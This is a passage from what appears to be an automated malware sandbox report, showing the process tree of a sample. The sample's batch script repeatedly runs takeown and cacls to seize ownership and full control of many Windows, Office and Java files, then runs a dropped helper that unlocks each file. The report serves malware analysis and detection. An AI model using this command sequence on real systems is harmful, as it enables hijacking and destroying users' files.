      Suspicious use of WriteProcessMemory
      PID:3796
    - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq64.exe
        
        cIzGULwq.exe -accepteula "qmgr.db" -nobanner
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:3568
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1592
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db" /E /G Admin:F /C
    3⤵
    PID:1432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db"
    3⤵
    PID:1520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "qmgr.db" -nobanner
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3248
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "qmgr.db" -nobanner
      4⤵
      Executes dropped EXE
      PID:3968
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3496
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\USOPrivate\UpdateStore\store.db""
  2⤵
  PID:1564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
    3⤵
    PID:2956
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOPrivate\UpdateStore\store.db"
    3⤵
    PID:3220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "store.db" -nobanner
    3⤵
    PID:1712
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "store.db" -nobanner
      4⤵
      Executes dropped EXE
      PID:1016
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2912
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\ClickToRun\ProductReleases\EE65D8FF-D437-4FAB-B3BC-C1431E48AD1A\en-us.16\stream.x64.en-us.db""
  2⤵
  PID:1140
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\ClickToRun\ProductReleases\EE65D8FF-D437-4FAB-B3BC-C1431E48AD1A\en-us.16\stream.x64.en-us.db" /E /G Admin:F /C
    3⤵
    PID:2160
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\ClickToRun\ProductReleases\EE65D8FF-D437-4FAB-B3BC-C1431E48AD1A\en-us.16\stream.x64.en-us.db"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "stream.x64.en-us.db" -nobanner
    3⤵
    PID:3372
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "stream.x64.en-us.db" -nobanner
      4⤵
      Executes dropped EXE
      PID:2168
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2656
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""
  2⤵
  PID:3828
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
    3⤵
    PID:2236
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
    3⤵
    - Modifies file permissions
    PID:648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "store.db" -nobanner
    3⤵
    PID:1564
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "store.db" -nobanner
      4⤵
      Executes dropped EXE
      PID:2444
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1680
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa""
  2⤵
  PID:4048
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:1104
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:3896
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:1144
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1140
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa""
  2⤵
  PID:3248
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:780
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa"
    3⤵
    PID:4048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:3756
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:3496
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3472
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  PID:3632
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
    3⤵
    PID:3460
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "superbar.png" -nobanner
    3⤵
    PID:3672
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "superbar.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:3916
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1628
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""
  2⤵
  PID:2096
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1396
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1520
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:3496
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:548
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml""
  2⤵
  PID:2968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml" /E /G Admin:F /C
    3⤵
    PID:2520
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner
    3⤵
    PID:3232
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:1936
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3672
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml""
  2⤵
  PID:2444
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml" /E /G Admin:F /C
    3⤵
    PID:3424
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner
    3⤵
    PID:3360
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:3756
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1520
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml""
  2⤵
  PID:3472
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml" /E /G Admin:F /C
    3⤵
    PID:3944
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner
    3⤵
    PID:1196
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:3916
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3232
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""
  2⤵
  PID:648
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C
    3⤵
    PID:2168
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3372
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
    3⤵
    PID:1140
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
      4⤵
      Executes dropped EXE
      PID:3980
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3588
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1""
  2⤵
  PID:2092
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C
    3⤵
    PID:2272
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "OfficeIntegrator.ps1" -nobanner
    3⤵
    PID:1920
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "OfficeIntegrator.ps1" -nobanner
      4⤵
      Executes dropped EXE
      PID:2984
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3916
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.275a3a31-e95e-4e65-a31a-3845cfc05d38.1.etl""
  2⤵
  PID:3248
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.275a3a31-e95e-4e65-a31a-3845cfc05d38.1.etl" /E /G Admin:F /C
    3⤵
    PID:3424
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.275a3a31-e95e-4e65-a31a-3845cfc05d38.1.etl"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MoUsoCoreWorker.275a3a31-e95e-4e65-a31a-3845cfc05d38.1.etl" -nobanner
    3⤵
    PID:1396
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MoUsoCoreWorker.275a3a31-e95e-4e65-a31a-3845cfc05d38.1.etl" -nobanner
      4⤵
      Executes dropped EXE
      PID:3668
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2956
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl""
  2⤵
  PID:3588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl" /E /G Admin:F /C
    3⤵
    PID:3960
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl" -nobanner
    3⤵
    PID:544
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl" -nobanner
      4⤵
      Executes dropped EXE
      PID:2984
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:972
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml""
  2⤵
  PID:3012
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml" /E /G Admin:F /C
    3⤵
    PID:548
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "AssemblyList_4_extended.xml" -nobanner
    3⤵
    PID:4048
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "AssemblyList_4_extended.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:3980
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3668
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""
  2⤵
  PID:1520
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:516
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:3960
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "behavior.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:2520
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3480
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""
  2⤵
  PID:3916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C
    3⤵
    PID:972
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:3424
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:3756
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3336
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  PID:2092
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:3772
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "background.png" -nobanner
    3⤵
    PID:1492
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "background.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1920
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3960
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""
  2⤵
  PID:2984
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2956
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:548
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:3980
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""
  2⤵
  PID:3360
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2424
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1148
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:2484
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1920
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""
  2⤵
  PID:3460
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1520
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:3336
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3772
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat""
  2⤵
  PID:516
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C
    3⤵
    PID:3588
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "StorageHealthModel.dat" -nobanner
    3⤵
    PID:2556
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "StorageHealthModel.dat" -nobanner
      4⤵
      Executes dropped EXE
      PID:3256
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3692
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml""
  2⤵
  PID:648
- - C:\Windows\SysWOW64\cacls.exe
